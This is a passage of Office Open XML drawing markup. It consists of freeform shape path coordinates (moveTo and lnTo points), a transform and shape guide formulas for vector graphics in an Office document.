                    <a:pt x="37" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168" y="518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293" y="470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333" y="468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369" y="463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422" y="470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447" y="475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488" y="483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501" y="487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514" y="489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526" y="491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619" y="273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603" y="155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="14"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="24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173060" y="2662922"/>
              <a:ext cx="504825" cy="476250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 577 w 636"/>
                <a:gd name="T1" fmla="*/ 264 h 602"/>
                <a:gd name="T2" fmla="*/ 577 w 636"/>
                <a:gd name="T3" fmla="*/ 177 h 602"/>
                <a:gd name="T4" fmla="*/ 515 w 636"/>
                <a:gd name="T5" fmla="*/ 184 h 602"/>
                <a:gd name="T6" fmla="*/ 475 w 636"/>
                <a:gd name="T7" fmla="*/ 144 h 602"/>
                <a:gd name="T8" fmla="*/ 455 w 636"/>
                <a:gd name="T9" fmla="*/ 184 h 602"/>
                <a:gd name="T10" fmla="*/ 466 w 636"/>
                <a:gd name="T11" fmla="*/ 193 h 602"/>
                <a:gd name="T12" fmla="*/ 508 w 636"/>
                <a:gd name="T13" fmla="*/ 204 h 602"/>
                <a:gd name="T14" fmla="*/ 541 w 636"/>
                <a:gd name="T15" fmla="*/ 224 h 602"/>
                <a:gd name="T16" fmla="*/ 563 w 636"/>
                <a:gd name="T17" fmla="*/ 276 h 602"/>
                <a:gd name="T18" fmla="*/ 549 w 636"/>
                <a:gd name="T19" fmla="*/ 310 h 602"/>
                <a:gd name="T20" fmla="*/ 455 w 636"/>
                <a:gd name="T21" fmla="*/ 394 h 602"/>
                <a:gd name="T22" fmla="*/ 383 w 636"/>
                <a:gd name="T23" fmla="*/ 428 h 602"/>
                <a:gd name="T24" fmla="*/ 285 w 636"/>
                <a:gd name="T25" fmla="*/ 431 h 602"/>
                <a:gd name="T26" fmla="*/ 190 w 636"/>
                <a:gd name="T27" fmla="*/ 469 h 602"/>
                <a:gd name="T28" fmla="*/ 110 w 636"/>
                <a:gd name="T29" fmla="*/ 374 h 602"/>
                <a:gd name="T30" fmla="*/ 63 w 636"/>
                <a:gd name="T31" fmla="*/ 332 h 602"/>
                <a:gd name="T32" fmla="*/ 85 w 636"/>
                <a:gd name="T33" fmla="*/ 297 h 602"/>
                <a:gd name="T34" fmla="*/ 98 w 636"/>
                <a:gd name="T35" fmla="*/ 255 h 602"/>
                <a:gd name="T36" fmla="*/ 143 w 636"/>
                <a:gd name="T37" fmla="*/ 250 h 602"/>
                <a:gd name="T38" fmla="*/ 161 w 636"/>
                <a:gd name="T39" fmla="*/ 238 h 602"/>
                <a:gd name="T40" fmla="*/ 246 w 636"/>
                <a:gd name="T41" fmla="*/ 290 h 602"/>
                <a:gd name="T42" fmla="*/ 232 w 636"/>
                <a:gd name="T43" fmla="*/ 193 h 602"/>
                <a:gd name="T44" fmla="*/ 208 w 636"/>
                <a:gd name="T45" fmla="*/ 111 h 602"/>
                <a:gd name="T46" fmla="*/ 238 w 636"/>
                <a:gd name="T47" fmla="*/ 118 h 602"/>
                <a:gd name="T48" fmla="*/ 270 w 636"/>
                <a:gd name="T49" fmla="*/ 85 h 602"/>
                <a:gd name="T50" fmla="*/ 291 w 636"/>
                <a:gd name="T51" fmla="*/ 67 h 602"/>
                <a:gd name="T52" fmla="*/ 334 w 636"/>
                <a:gd name="T53" fmla="*/ 110 h 602"/>
                <a:gd name="T54" fmla="*/ 370 w 636"/>
                <a:gd name="T55" fmla="*/ 93 h 602"/>
                <a:gd name="T56" fmla="*/ 349 w 636"/>
                <a:gd name="T57" fmla="*/ 252 h 602"/>
                <a:gd name="T58" fmla="*/ 398 w 636"/>
                <a:gd name="T59" fmla="*/ 267 h 602"/>
                <a:gd name="T60" fmla="*/ 433 w 636"/>
                <a:gd name="T61" fmla="*/ 192 h 602"/>
                <a:gd name="T62" fmla="*/ 390 w 636"/>
                <a:gd name="T63" fmla="*/ 257 h 602"/>
                <a:gd name="T64" fmla="*/ 366 w 636"/>
                <a:gd name="T65" fmla="*/ 216 h 602"/>
                <a:gd name="T66" fmla="*/ 377 w 636"/>
                <a:gd name="T67" fmla="*/ 70 h 602"/>
                <a:gd name="T68" fmla="*/ 341 w 636"/>
                <a:gd name="T69" fmla="*/ 94 h 602"/>
                <a:gd name="T70" fmla="*/ 291 w 636"/>
                <a:gd name="T71" fmla="*/ 34 h 602"/>
                <a:gd name="T72" fmla="*/ 266 w 636"/>
                <a:gd name="T73" fmla="*/ 53 h 602"/>
                <a:gd name="T74" fmla="*/ 227 w 636"/>
                <a:gd name="T75" fmla="*/ 105 h 602"/>
                <a:gd name="T76" fmla="*/ 185 w 636"/>
                <a:gd name="T77" fmla="*/ 83 h 602"/>
                <a:gd name="T78" fmla="*/ 208 w 636"/>
                <a:gd name="T79" fmla="*/ 171 h 602"/>
                <a:gd name="T80" fmla="*/ 234 w 636"/>
                <a:gd name="T81" fmla="*/ 272 h 602"/>
                <a:gd name="T82" fmla="*/ 173 w 636"/>
                <a:gd name="T83" fmla="*/ 232 h 602"/>
                <a:gd name="T84" fmla="*/ 131 w 636"/>
                <a:gd name="T85" fmla="*/ 214 h 602"/>
                <a:gd name="T86" fmla="*/ 86 w 636"/>
                <a:gd name="T87" fmla="*/ 235 h 602"/>
                <a:gd name="T88" fmla="*/ 39 w 636"/>
                <a:gd name="T89" fmla="*/ 241 h 602"/>
                <a:gd name="T90" fmla="*/ 65 w 636"/>
                <a:gd name="T91" fmla="*/ 305 h 602"/>
                <a:gd name="T92" fmla="*/ 22 w 636"/>
                <a:gd name="T93" fmla="*/ 333 h 602"/>
                <a:gd name="T94" fmla="*/ 110 w 636"/>
                <a:gd name="T95" fmla="*/ 398 h 602"/>
                <a:gd name="T96" fmla="*/ 173 w 636"/>
                <a:gd name="T97" fmla="*/ 469 h 602"/>
                <a:gd name="T98" fmla="*/ 235 w 636"/>
                <a:gd name="T99" fmla="*/ 472 h 602"/>
                <a:gd name="T100" fmla="*/ 307 w 636"/>
                <a:gd name="T101" fmla="*/ 460 h 602"/>
                <a:gd name="T102" fmla="*/ 342 w 636"/>
                <a:gd name="T103" fmla="*/ 461 h 602"/>
                <a:gd name="T104" fmla="*/ 404 w 636"/>
                <a:gd name="T105" fmla="*/ 452 h 602"/>
                <a:gd name="T106" fmla="*/ 489 w 636"/>
                <a:gd name="T107" fmla="*/ 455 h 602"/>
                <a:gd name="T108" fmla="*/ 508 w 636"/>
                <a:gd name="T109" fmla="*/ 374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6" h="602">
                  <a:moveTo>
                    <a:pt x="636" y="268"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="624" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554" y="170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540" y="176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462" y="170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464" y="164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559" y="273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446" y="438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431" y="436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400" y="431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383" y="428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344" y="422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273" y="437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155" y="398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="117"/>
